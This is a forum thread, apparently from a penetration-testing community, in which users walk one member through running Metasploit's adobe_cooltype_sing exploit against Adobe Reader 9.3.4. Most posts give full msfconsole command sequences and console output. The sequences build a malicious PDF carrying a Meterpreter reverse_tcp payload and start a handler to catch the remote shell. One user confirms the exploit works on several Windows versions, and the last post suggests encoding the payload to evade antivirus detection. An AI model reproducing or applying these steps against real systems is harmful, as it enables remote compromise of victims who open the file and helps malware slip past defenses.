adobe_cooltype_sing

[pentest09]

Hi all I have just seen this exploit write up and would like to know how to add it to metasploit to try out, in what directory would i place the file as a

search adobe_cooltype_sing does not show up and i believe i will have to place it manually i have the rb file

Also since I did the -apt-get upgrade for the new harvester update i cant seem to update msf but was able before using set...

Thanks

[TAPE]

For a write up on the adobe_cooltype_sing you can have a look at ;
New Adobe 0day Demonstration | Attack Vector

Further, regarding updating msf, open msfconsole and then msfupdate;

Code:

msfconsole
msfupdate

edit
-----
edited as moved from original location where posted/

[pentest09]

thanks will try it just reverted backto snapshot before -upgrade and set updated it for fine so think it was the upgrade broke the app, and yeah found the write up on attack vector.

thanks for quick reply

[brtw2003]

Not the place for questions, this is a place for explanations on how things are done..

For a write up on the adobe_cooltype_sing you can have a look at ;
New Adobe 0day Demonstration | Attack Vector

Further, regarding updating msf, open msfconsole and then msfupdate;

Code:

msfconsole
msfupdate

..after update

Code:

msfconsole
use  exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /tmp/test_adobe.pdf
set LHOST x.x.x.x
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
use exploit/multi/handler
set LHOST x.x.x.x
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
exploit -j

Note: i start explicitly the sesssion handler, because it's not properly started with the fileformat
exploit

copy /tmp/test_adobe.pdf onto your windows box & execute....watch msf3 console ;-)
especially be surprised if you use latest adobe 9.3.4!

...exploit it is not working on my XP3 with adobe 9.3.4 (enable/disable JS)box - adobe crashs...didn't
have time yet to analyze...

/brtw2003

[pentest09]

HI again jst run the exploit and it gives me an url instead of creating the pdf file heres the output whats wrong ?

msf > use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set filename test.pdf
filename => test.pdf
msf exploit(adobe_cooltype_sing) > set outputpath /tmp
outputpath => /tmp
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
LHOST => 192.168.0.8
msf exploit(adobe_cooltype_sing) > exploit[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.8:4444[*] Using URL: http://0.0.0.0:8080/wcTXIWj[*] Local IP: http://192.168.0.8:8080/wcTXIWj[*] Server started.
msf exploit(adobe_cooltype_sing) >[*] Sending crafted PDF to 192.168.0.5:52492
[-] Exception handling request: Connection reset by peer (thats me running it again in ie8)[*] Sending crafted PDF to 192.168.0.5:52498[*] Sending crafted PDF to 192.168.0.5:52500

just hangs....

please advise...

[hypervista]

pentest09 - I suggest you re-read brtw2003's post, particularly the step-by-step example he gave and the explicit note:

Note: i start explicitly the sesssion handler, because it's not properly started with the fileformat exploit

Research a little bit, study the on-line guides for Metasploit and try a few things out. But brtw2003 has pretty much laid it out there for you.

Btw - i just confirmed though my own testing that this particular exploit does in fact work on Windows XP SP3, Windows Vista and Windows 7, all with the latest Reader v9.3.4.

[pentest09]

My fault rushing sorry so when the multi/handler is run it should create my pdf and set up the session correctly? I though that the first part would create the pdf even before the problem with the handling of the reverse connection.

Will try thanks for your response..

just tried it and got this:

msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
OUTPUTPATH => /tmp/test_adobe.pdf
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
LHOST => 192.168.0.8
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit
[*] Started reverse handler on 192.168.0.8:4444[*] Creating 'msf.pdf' file...
[-] Exploit exception: No such file or directory - /tmp/test_adobe.pdf/msf.pdf (so do i need a pdf in the first place to embed the explit code in to)[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.8
LHOST => 192.168.0.8
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j[*] Exploit running as background job.

Its the file creation thats the problem

[sickness]

Why won't you pay attention ?

You typed:

Code:

msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
OUTPUTPATH => /tmp/test_adobe.pdf
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8

The outputpath is only where to put the .pdf if you want to give it a name change filename
The correct command:

Code:

msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/

[pentest09]

Ok lads got it in the first write up it showed set output path i use set filename and it worked, thanks again ESET picked it up on win 7 anyway.

cheers

[TAPE]

WIll have to have a look when I got a moment, but isnt there a way to output to raw data and encode before creating pdf ?

That might help AV detection evasion.